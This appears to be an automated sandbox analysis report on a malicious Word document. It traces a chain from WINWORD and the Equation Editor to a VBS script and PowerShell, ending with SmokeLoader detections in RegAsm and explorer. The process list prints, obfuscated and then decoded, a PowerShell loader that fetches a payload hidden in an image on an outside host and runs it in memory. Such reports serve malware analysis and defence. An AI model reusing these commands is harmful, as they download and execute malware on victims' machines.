                                                    2024-08-31 17:25:07 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                    Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                    Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:13:24:57
                                                    Start date:31/08/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                    Imagebase:0x13f1e0000
                                                    File size:1'423'704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:1
                                                    Start time:13:24:58
                                                    Start date:31/08/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:13:25:01
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
                                                    Imagebase:0x310000
                                                    File size:141'824 bytes
                                                    MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:13:25:01
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                    Imagebase:0x1080000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:13:25:04
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                    Imagebase:0x1080000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:13:25:08
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0x130000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:13:25:08
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0x130000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:13:25:08
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    Imagebase:0x130000
                                                    File size:64'704 bytes
                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:13:25:13
                                                    Start date:31/08/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xff2f0000
                                                    File size:3'229'696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:13
                                                    Start time:13:25:21
                                                    Start date:31/08/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
